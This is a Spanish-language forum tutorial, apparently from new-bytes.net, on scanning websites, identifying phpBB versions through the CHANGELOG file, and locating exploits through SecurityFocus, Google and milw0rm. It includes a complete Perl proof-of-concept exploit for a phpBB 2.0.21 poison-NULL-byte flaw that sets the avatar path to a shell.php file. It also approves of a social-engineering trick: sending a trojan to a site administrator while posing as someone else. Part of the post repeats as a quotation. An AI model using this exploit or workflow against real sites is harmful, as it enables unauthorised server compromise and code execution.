Tutorial Securityfocus : Buscando informacion sobre las Vulnerabilidades

- Tutorial Creado para New-Bytes.net

- En este Tutorial Explicare la forma mas facil de encontrar informacion sobre las vulnerabilidades de las distintas aplicaciones que se encuentran en una pagina web, no intenta de ser una guia paso a paso, pero si un buen referente para que luego exploten sus propios metodos de investigacion, y principalmente leer , para evitar preguntas sin sentidos. Oz ¡

Ahy varias formas de auditar una pagina web, si no es via "host" escaneando sus puertos y examinando que Servicios Tienen corriendo, (ftp, http, etc):

Código:

nmap -v -sSV -P0

Tambien se puede hacer una "escanear" manual, buscando los Scripts que ocupan, foros, blogs, sistemas de noticias, etc..

[alerta] Un aspecto esencial es ver de que version es.

Este Ejemplo es en los foros PHPBB

Código:

http://<server>/[path]/docs/CHANGELOG.html

Le agregamos una Version mas, por ejemplo si Sale 2.0.20 , es 2.0.21, porque ahy explica los cambios que se s creado en la version anterior 2.0.20 pero en esta "version" 2.0.21 todavia no lo corrigen, o mejor dicho el administrador no actualiza el script

En una forma bastante eficaz, porque muchos de estos scripts son bastante vulnerables , RFI, SQL, XSS entre otros.
La ventaja es que estas vulnerabilidades se pueden explotar directamente desde el navegador, pero siempre existen programas que facilitan este procedimiento, creando script en perl, php, etc, para solo introducir los datos y este aprovecha la vulnerabilidad.

[ide-bombilla] Antes de avanzar quiero aclarar algo:

Vulnerabilidad = Fallo en el sistema, para que cualquier usuarios mal "intencionado" pueda ejecutar codigos arbitrarios en el sistema victima
Exploit = Codigo (compilado, interpretado),o Accion que aprovecha una vulnerabilidad, para tener privilegios en el sistema.

¿A que me refiero con Accion?

Que no necesariamente tiene que ser un Exploit escrito en Perl que se tenga que interpretar , si no tambien una simple inyeccion sql , rfi, xss, es un exploit. Codigos directamente incrustados desde el navegador, muchos users creen que el "Exploit" tiene que ser un programa que se tiene que compilar o interpretar, pero esto no es asi. Puede ser cualquier codigo, o incluso puede ser hasta ing social

Hacerce pasar por chica en msn y enviarle un troyano al administrador para averiguar la password de su sitio sigue siendo parte de un Exploit. Pero no es ni un Codigo ni Nada "Human Exploit"

No e Escuchado a nadie Hacer termino a "Human Exploit" como parte de un tipo de Exploit mas, pero intento que si se haga XD¡. para hacer referencia a la Ing social como parte de un Exploit (que aprovecha una vulnerabilidad)

Una ves Vista la Version del Script, En este caso el Foro PHPBB, Talves nos surgan las siguientes dudas:

¿Que tenemos que Hacer Ahora?

Citar

R: Ir algun Bugtrag y Buscar si Existen alguna Vulnerabilidad

¿Donde la Encuentro?

Citar

www.Securityfocus.com

¿Estara Listo?

Citar

Si existe alguna vulnerabilidad, existira alguna explicacion, pero no necesariamente existira algun tipo de exploit

¿Tendre que Leer?

Citar

Si no te gusta leer no sigas leyendo

[alerta] Buscando en la Enciclopedia de las Vulnerabilidad:

Ingresamos a www.Securityfocus.com
Ingresamos a Vulnerabilities

En Vendor Selecionamos el Nombre del Script, en este caso PHPBB

y Buscamos su Version

Algunas Veces nos nos encontraremos con Ninguna Vulnerabilidad.

Una vez Encontrada la Version, Podremos visualizar las Vulnerabilidades, ahora devemos ingresar a los Link expuestos para poder averiguar ¿Que tipo de Vulnerabilidad Tiene? y asi Poder seguir buscando.

Para Cada vulnerabilidad tenemos que leer su descripcion, ahora el ingles no es una dificultar ¿puedes leer? ¿Sabes Ocupar Google? .

Citar

El Script PHPBB esta suseptible a la ejecucion de codigos php arbitrarios, los atacantes puedes tener privilegios sobre el servidor en donde se aloja la pagina web

Ingresamos a la Pestaña Exploit:

Citar

Los atacantes puedes Explotar esta vulnerabilidad por el navegador

[alerta] Ahora ya tenemos mas informacion sobre las vulnerabilidad, es importante leer cada una de ellas, para asi tener una mayor posibilidad para poder encontrar algun Exploit.

En lo Personal Si quiero Buscar algun Exploit Parto Obviamente por el titulo:

Google

Citar

"phpBB Avatar_Path PHP Code Execution Vulnerability"exploit

Claramento aunque no en todos los casos , nos devolvera los link de securityfocus al inicio, pero ahy otras webs de seguridad , en donde dan como noticia la misma vulnerabilidad, en algunos casos estos sitios exponen links directos hacia los exploits, o como tambien en muchos casos que no.

Pero tambien si analizamos un poco mas, podriamos buscar por el autor , quien descubrio la Vulnerabilidad, mas otras palabras claves:

[ide-bombilla] Como ven nos Tira un Link hacia Milw0rm donde claramente ahy un Exploit.

http://www.milw0rm.com/exploits/2348

Código:

#!/usr/bin/perl -w
# Author: ShAnKaR
# Title: multiple PHP application poison NULL byte vulnerability
# Applications: phpBB 2.0.21, punBB 1.2.12
# Threat Level: Critical
# Original advisory (in Russian): http://www.security.nnov.ru/Odocument221.html
#
# Poison NULL byte vulnerability for perl CGI applications was described
# in [1]. ShAnKaR noted, that same vulnerability also affects different
# PHP applications. An example of vulnerable applications are phpBB and
# punBB.
#
# Vulnerability can be used to upload or replace arbitrary files on
# server, e.g. PHP scripts, by adding "poison NULL" (%00) to filename.
#
# In case of phpBB and punBB vulnerability can be exploited by changing
# location of avatar file and uploading avatar file with PHP code in EXIF
# data.
#
# A PoC exploit to change Avatar file location for phpBB:
#
#

use HTTP::Cookies;
use LWP;
use URI::Escape;
unless( @ARGV){die "USE:\n./phpbb.pl localhost.com/forum/ admin pass images/avatars/shell.php [d(DEBUG)]\n"}
my $ua = LWP::UserAgent->new(agent=>'Mozilla/4.0 (compatible; Windows 5.1)');
$ua->cookie_jar( HTTP::Cookies->new());

$url='http://'.$ARGV[0].'/login.php';
$data="username=".$ARGV[1]."&password=".$ARGV[2]."&login=1";
my $req = new HTTP::Request 'POST',$url;
$req->content_type('application/x-www-form-urlencoded');
$req->content($data);
my $res = $ua->request($req);

$res=$ua->get('http://'.$ARGV[0].'/login.php');
$content=$res->content;
$content=~ m/true&sid=([^"]+)"/g;
if($ARGV[4]){
$content=$res->content;
print $content;
}
$url='http://'.$ARGV[0].'/login.php';
$data="username=".$ARGV[1]."&password=".$ARGV[2]."&login=1&admin=1";
$req = new HTTP::Request 'POST',$url;
$req->content_type('application/x-www-form-urlencoded');
$req->content($data);
$res = $ua->request($req);

$url='http://'.$ARGV[0].'/admin/admin_board.php?sid='.$1;
$data="submit=submit&allow_avatar_local=1&avatar_path=".$ARGV[3]."%00";
$req = new HTTP::Request 'POST',$url;
$req->content_type('application/x-www-form-urlencoded');
$req->content($data);
$res = $ua->request($req);
if($ARGV[4]){
$content=$res->content;
print $content;
}

# milw0rm.com [2006-09-11]

[alerta] Eso era con 1 sola Vulnerabilidad, ahora expondre los Link de las otras vulnerabilidad que encontro Securityfocus en su Base de datos:

phpBB Privmsg.PHP HTML Injection Vulnerability

Nivisec Admin Topic Action Logging Module Remote File Include Vulnerability

Securitfocus nos ayuda bastante para empezar , a buscar las vulnerabilidades, asi podremos ir cada vez avanzado, pero ya teniendo una Guia.

[alerta] Para Entender ahy que leer sobre los distintos tipos de Vulnerabilidad, no sacamos nada, con encontrar el exploit, si no sabemos que es lo que hace, es por ello que es necesario leer sobre las "nociones basicas" de las distintas vulnerabilidades, y asi tambien algun lenguaje de programacion, si no hacen esto, existiran preguntas talves como:

¿Que hago Ahora?
Lo Compilo y no Sale nada¡
¿Que es Exploit?

Ahy una buena base de informacion en el Foro de Vulnerabildiades de new-bytes.net

[alerta] LEEER¡ NO EVITAR LA FLOJERA MENTAL ¡¡¡ AHY QUE LEER¡' PARA SABER¡¡¡

Creo que es una Duda bastante recurrente y bueno , es bueno resolver una duda mas aunque sea pequeña .

Oz www.new-Bytes.net

Si van a Copiar Exponer de donde lo sacaron, y quien es el autor.

- Tutorial Creado para New-Bytes.net

Este es el Tuto:

Cita de: OzX en Mayo 31, 2007, 10:09:46

Ahy varias formas de auditar una pagina web, si no es via "host" escaneando sus puertos y examinando que Servicios Tienen corriendo, (ftp, http, etc):

Código:

nmap -v -sSV -P0

Código:

http://<server>/[path]/docs/CHANGELOG.html

Citar

R: Ir algun Bugtrag y Buscar si Existen alguna Vulnerabilidad

¿Donde la Encuentro?

Citar

www.Securityfocus.com

¿Estara Listo?

Citar

Si existe alguna vulnerabilidad, existira alguna explicacion, pero no necesariamente existira algun tipo de exploit

¿Tendre que Leer?

Citar

Si no te gusta leer no sigas leyendo

[alerta] Buscando en la Enciclopedia de las Vulnerabilidad:

Ingresamos a www.Securityfocus.com
Ingresamos a Vulnerabilities

En Vendor Selecionamos el Nombre del Script, en este caso PHPBB

y Buscamos su Version

Algunas Veces nos nos encontraremos con Ninguna Vulnerabilidad.

Para Cada vulnerabilidad tenemos que leer su descripcion, ahora el ingles no es una dificultar ¿puedes leer? ¿Sabes Ocupar Google? .

Citar

El Script PHPBB esta suseptible a la ejecucion de codigos php arbitrarios, los atacantes puedes tener privilegios sobre el servidor en donde se aloja la pagina web

Ingresamos a la Pestaña Exploit:

Citar

Los atacantes puedes Explotar esta vulnerabilidad por el navegador

Citar

"phpBB Avatar_Path PHP Code Execution Vulnerability"exploit

Pero tambien si analizamos un poco mas, podriamos buscar por el autor , quien descubrio la Vulnerabilidad, mas otras palabras claves:

[ide-bombilla] Como ven nos Tira un Link hacia Milw0rm donde claramente ahy un Exploit.

http://www.milw0rm.com/exploits/2348

Código:

[alerta] Eso era con 1 sola Vulnerabilidad, ahora expondre los Link de las otras vulnerabilidad que encontro Securityfocus en su Base de datos:

phpBB Privmsg.PHP HTML Injection Vulnerability

	Bienvenido(a), Visitante. Favor de ingresar o registrarse. ¿Perdiste tu email de activación? - Agosto 07, 2008, 05:31:22 Boton Buscar